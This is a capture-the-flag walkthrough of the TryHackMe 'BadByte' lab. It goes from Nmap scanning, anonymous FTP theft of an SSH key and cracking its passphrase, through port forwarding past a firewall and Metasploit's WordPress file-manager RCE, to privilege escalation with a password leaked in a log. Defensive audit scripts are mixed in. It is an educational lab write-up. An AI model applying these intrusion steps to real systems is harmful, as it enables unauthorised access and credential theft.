Port forwarding is a networking technique that allows a user to access services on a computer or network behind a firewall or router. It opens up specific ports on a computer or network to allow external devices to connect and access services and applications on the internal network.
- Link: https://tryhackme.com/room/badbyte
- Difficulty: Easy
- Target: “user.txt”, “root.txt” on the targetIP
- Highlight: Using port forwarding to make an internal website accessible (i.e., hackable) outside the network.
- Tags: FTP, port forwarding
Let’s start by noting down our IP addresses and exporting them as variables in the terminal.
export targetIP=10.10.241.193
export myIP=10.6.2.23
Next, let’s run a standard Nmap scan. The -p- flag scans all 65535 TCP ports and -vv asks for very verbose output.
```
┌─[kalisurfer@parrot]─[~]
└──╼ $nmap -p- -vv 10.10.241.193
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-30 14:24 EST
Initiating Ping Scan at 14:24
Scanning 10.10.241.193 [2 ports]
Completed Ping Scan at 14:24, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:24
Completed Parallel DNS resolution of 1 host. at 14:24, 0.03s elapsed
Initiating Connect Scan at 14:24
Scanning 10.10.241.193 [65535 ports]
Discovered open port 22/tcp on 10.10.241.193
Increasing send delay for 10.10.241.193 from 0 to 5 due to 45 out of 149 dropped probes since last increase.
Discovered open port 30024/tcp on 10.10.241.193
```
Now we’ll run another more targeted Nmap scan to drill in on the open ports.
```
┌─[kalisurfer@parrot]─[~]
└──╼ $nmap -A -p 22,30024 10.10.241.193
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-30 14:26 EST
Nmap scan report for 10.10.241.193
Host is up (0.086s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f3:a2:ed:93:4b:9c:bf:bb:33:4d:48:0d:fe:a4:de:96 (RSA)
|   256 22:72:00:36:eb:37:12:9f:5a:cc:c2:73:e0:4f:f1:4e (ECDSA)
|_  256 78:1d:79:dc:8d:41:f6:77:60:65:f5:74:b6:cc:8b:6d (ED25519)
30024/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.6.2.23
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp          1743 Mar 23  2021 id_rsa
|_-rw-r--r--    1 ftp      ftp            78 Mar 23  2021 note.txt
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.78 seconds
```
Let’s focus first on the FTP service running on port 30024. It allows anonymous FTP login, so we should be able to view and copy the two files listed in the directory.
We can log into the FTP service with the command:
lftp -p 30024 10.10.241.193
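The anonymous-FTP exposure above is the kind of finding a routine scan of your own hosts should raise. As an added example, not code from the original walkthrough, this Python snippet parses Nmap's ftp-anon output and flags anonymous logins, sensitive file names such as private keys, and world-writable entries. The scan text is constructed to mirror the result above, and the list of sensitive names is my own assumption.

```python
import re

# Constructed sample mirroring the ftp-anon block of the nmap -A scan above
SAMPLE_NMAP = """\
30024/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp          1743 Mar 23  2021 id_rsa
|_-rw-r--r--    1 ftp      ftp            78 Mar 23  2021 note.txt
"""

# Names that should never be readable from an anonymous FTP root (assumed list)
SENSITIVE = re.compile(r"^(id_(rsa|dsa|ecdsa|ed25519)|.*\.(pem|key|ppk)|\.?bash_history|shadow)$")
PORT_LINE = re.compile(r"^(\d+)/tcp\s+open\s+ftp\b")
# ls-style listing as printed by the ftp-anon script: mode links owner group size mon day year name
LISTING = re.compile(
    r"^\|_?\s*(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+(?P<size>\d+)"
    r"\s+\S+\s+\d+\s+\S+\s+(?P<name>\S+)$"
)

def audit_ftp_anon(nmap_text):
    """Return (port, finding) tuples for each anonymous-FTP exposure in the scan text."""
    findings = []
    port, anon = None, False
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line)
        if m:                                   # new FTP service: reset per-port state
            port, anon = int(m.group(1)), False
            continue
        if port is None:
            continue
        if "Anonymous FTP login allowed" in line:
            anon = True
            findings.append((port, "anonymous login enabled"))
            continue
        m = LISTING.match(line)
        if not (m and anon):
            continue
        name, mode = m.group("name"), m.group("mode")
        if SENSITIVE.match(name):
            findings.append((port, f"sensitive file exposed: {name} ({m.group('size')} bytes)"))
        if mode[8] == "w":                      # others-write bit: anonymous users could replace it
            findings.append((port, f"world-writable: {name}"))
    return findings

for port, finding in audit_ftp_anon(SAMPLE_NMAP):
    print(f"port {port}: {finding}")
```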
In note.txt (dated Mar 23 2021) we find a clue mentioning a possible username:
CRACKING THE SSH PASSCODE WITH JOHN
Let’s first attempt to log in without knowing the password, using the id_rsa file as an SSH private key:
ssh -i id_rsa errorcauser@10.10.241.193
We get the following error:
Permissions 0644 for 'id_rsa' are too open.
To use this key, we need to set more restrictive permissions on the file. We’ll use the following command:
sudo chmod 600 id_rsa
We also need to use John the Ripper to crack the passphrase protecting the encrypted SSH private key.
First, we’ll convert the key into a hash format that John the Ripper accepts using ssh2john.py. My attack machine doesn’t have the program, so I grab it from this git repo and run it with the following command to save the hash in a new file.
python3 ssh2john.py id_rsa > hash
Next, we run John the Ripper on the hash with the simple command:
A few seconds later, John finds a password match (errorcauser:cupcake). Now we have everything we need to SSH into the target machine.
SETTING UP PORT FORWARDING
In this box, the target machine has a firewall set up to block public access to the website hosted on port
We can get around the firewall with SSH dynamic port forwarding. Let’s SSH into the target machine with the following command, supplying the passphrase John recovered:
sudo ssh -i id_rsa -D 1337 errorcauser@10.10.241.193
(-D sets up dynamic port forwarding: a SOCKS proxy on local port 1337 that tunnels through the SSH session.)
And we are in as user errorcauser.
Now we need to edit the proxychains config file at /etc/proxychains.conf, following the instructions in the TryHackMe room, so that it points at a socks5 proxy on 127.0.0.1 port 1337 (the local end of our SSH tunnel).
Now let’s run an Nmap scan of the target’s loopback interface through the tunnel:
proxychains nmap -sT 127.0.0.1
(-sT selects a TCP connect scan; proxychains can only relay full TCP connections, so the default SYN scan would not go through the SOCKS proxy.)
Next, we set up local port forwarding so that port 80 on the target’s loopback interface is reachable on our own port 80 (sudo is needed because binding a local port below 1024 requires root):
sudo ssh -i id_rsa -L 80:127.0.0.1:80 errorcauser@10.10.241.193
Now that the tunnel is up, we can check whether our browser can open the website at http://127.0.0.1/.
Bingo! Port forwarding is now running as intended!
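From the defender's side, the bypass works because the firewall filters port 80 while sshd still lets any authenticated user tunnel to loopback services. As an added example, not part of the original walkthrough, this Python check reads an sshd_config and reports the forwarding settings that make such tunnels possible. The two sample configs are constructed, and the parser only audits the global section (Match blocks are skipped, an assumed simplification).

```python
import re

# Constructed samples: the permissive default most distributions ship, and a hardened variant
WEAK_CONFIG = """\
PasswordAuthentication no
AllowTcpForwarding yes
X11Forwarding no
"""
HARDENED_CONFIG = """\
PasswordAuthentication no
AllowTcpForwarding no
GatewayPorts no
PermitOpen none
"""

# Defaults from sshd_config(5); sshd applies the FIRST value it sees for a keyword
DEFAULTS = {"allowtcpforwarding": "yes", "gatewayports": "no", "permitopen": "any"}

def parse_sshd_config(text):
    """Keyword -> value for the global section, honouring sshd's first-match rule."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, value = (re.split(r"[\s=]+", line, maxsplit=1) + [""])[:2]
        if key.lower() == "match":      # assumed simplification: skip conditional Match blocks
            break
        cfg.setdefault(key.lower(), value.strip().lower())
    return cfg

def audit_forwarding(text):
    """Return findings explaining which settings let an SSH user tunnel past the firewall."""
    cfg = {**DEFAULTS, **parse_sshd_config(text)}
    tcp = cfg["allowtcpforwarding"]
    findings = []
    if tcp in ("yes", "all", "local"):
        findings.append("AllowTcpForwarding allows -L/-D tunnels: a host firewall on port 80 does not protect services bound to loopback")
        if cfg["permitopen"] == "any":
            findings.append("PermitOpen is unrestricted: any host:port on the server side is reachable through -L/-D")
    if tcp in ("yes", "all", "remote"):
        findings.append("AllowTcpForwarding allows -R tunnels back into the client's network")
    if cfg["gatewayports"] in ("yes", "clientspecified"):
        findings.append("GatewayPorts lets remote forwards listen on non-loopback addresses")
    return findings

for name, sample in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
    print(name, audit_forwarding(sample) or ["no forwarding risks found"])
```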
Browsing the website reveals hints that it is a WordPress site. We can use a dedicated Nmap script to enumerate WordPress themes and plugins:
sudo nmap -sV --script http-wordpress-enum 127.0.0.1
```
┌─[kalisurfer@parrot]─[~/THM/badbyte-walkthrough]
└──╼ $sudo nmap -sV --script http-wordpress-enum 127.0.0.1
[sudo] password for kalisurfer:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-30 15:12 EST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.0000060s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        vsftpd 3.0.3
80/tcp   open  http       Apache httpd 2.4.29 ((Ubuntu))
| http-wordpress-enum:
| Search limited to top 100 themes/plugins
|   plugins
|_    duplicator 1.3.26
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp  open  rpcbind    2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
5432/tcp open  postgresql PostgreSQL DB 9.6.0 or later
| fingerprint-strings:
|   SMBProgNeg:
|     SFATAL
|     VFATAL
|     C0A000
|     Munsupported frontend protocol 65363.19778: server supports 2.0 to 3.0
|     Fpostmaster.c
|     L2127
|_    RProcessStartupPacket
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.92%I=7%D=12/30%Time=63AF464A%P=x86_64-pc-linux-gnu%r(S
SF:MBProgNeg,8C,"E\0\0\0\x8bSFATAL\0VFATAL\0C0A000\0Munsupported\x20fronte
SF:nd\x20protocol\x2065363\.19778:\x20server\x20supports\x202\.0\x20to\x20
SF:3\.0\0Fpostmaster\.c\0L2127\0RProcessStartupPacket\0\0");
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds
```
Another option for WordPress enumeration is the classic command-line tool wpscan:
```
┌─[kalisurfer@parrot]─[~/THM/badbyte-walkthrough]
└──╼ $wpscan --url 127.0.0.1
_______________________________________________________________
         WordPress Security Scanner by the WPScan Team
                         Version 3.8.21
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://127.0.0.1/ [127.0.0.1]
[+] Started: Fri Dec 30 15:27:00 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://127.0.0.1/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://127.0.0.1/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://127.0.0.1/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.7 identified (Insecure, released on 2021-03-09).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://127.0.0.1/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://127.0.0.1/, Match: 'WordPress 5.7'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:03 <===============> (137 / 137) 100.00% Time: 00:00:03
[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Dec 30 15:27:10 2022
[+] Requests Done: 180
[+] Cached Requests: 4
[+] Data Sent: 41.932 KB
[+] Data Received: 19.464 MB
[+] Memory used: 239.887 MB
[+] Elapsed time: 00:00:10
```
EXPLOITING WORDPRESS PLUGINS WITH METASPLOIT
Now it is time to fire up Metasploit and search for modules that target the two plugins found on the site: duplicator and file-manager.
The first module (scanner/http/wp_duplicator_file_read) can retrieve a list of users and services running on the machine. We’ll save this for later in case it comes in handy.
The second module (multi/http/wp_file_manager_rce) enables remote code execution. We will go forward with this attack vector to gain our initial foothold.
And we’ve now found our user.txt file in user cth’s home directory. Next, we continue enumerating the machine for ways to escalate privileges.
While enumerating, we come across a readable bash.log file. A misspelling by cth caused him to accidentally type his previous password in cleartext (G00dP@$sw0rd2020). Maybe the new one is the same password with the year bumped?
Let’s try it and, lo and behold, it works! I think it’s time for user cth to get a completely new password, not just keep changing the end to the current year’s date!
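The year-suffix habit spotted here is exactly what a password-change check should reject. As an added example, not the author's code, this Python function compares a proposed password with the previous one and refuses trivial rotations such as bumping the trailing year. The old password is the one quoted above, the candidate new passwords are constructed, and the suffix pattern and 0.8 similarity threshold are my own assumptions.

```python
import re
from difflib import SequenceMatcher

# Year, counter or punctuation bolted onto the end of an otherwise reused password (assumed pattern)
TRAILING = re.compile(r"[0-9!@#$%^&*?.]{1,6}$")
SIMILARITY_LIMIT = 0.8   # assumed threshold, similar in spirit to pam_pwquality's difok check

def stem(password):
    """Lower-cased password with any trailing year/counter/punctuation removed."""
    return TRAILING.sub("", password).lower()

def is_trivial_rotation(old, new):
    """Return (rejected, reason) for a proposed password change."""
    if old == new:
        return True, "unchanged"
    if stem(old) and stem(old) == stem(new):
        return True, "only the suffix (year/counter/punctuation) or case changed"
    if new.lower() == old.lower()[::-1]:
        return True, "old password reversed"
    # Catch-all for small edits elsewhere in the string (e.g. one character swapped)
    ratio = SequenceMatcher(None, old.lower(), new.lower()).ratio()
    if ratio >= SIMILARITY_LIMIT:
        return True, f"too similar to the previous password (ratio {ratio:.2f})"
    return False, "ok"

# The previous password leaked in bash.log, and constructed candidates for the new one
OLD = "G00dP@$sw0rd2020"
CANDIDATES = ["G00dP@$sw0rd2023", "g00dp@$sw0rd2024!", "G00dP@$sw0rdX", "plum-ox-river-42"]

for candidate in CANDIDATES:
    rejected, reason = is_trivial_rotation(OLD, candidate)
    print(f"{candidate!r}: {'REJECT' if rejected else 'accept'} ({reason})")
```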
SSH’ing in as cth@10.10.241.193, we can continue looking for a way to escalate privileges.
And the final step is to cat out the root.txt flag:
sudo cat /root/root.txt
Where To Next?
Among other tools, we used a port scanner in this tutorial. Want to dive deeper into security research? Read on here:
👉 Recommended Tutorial: Creating a Port Scanner with Python Networking Sockets
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.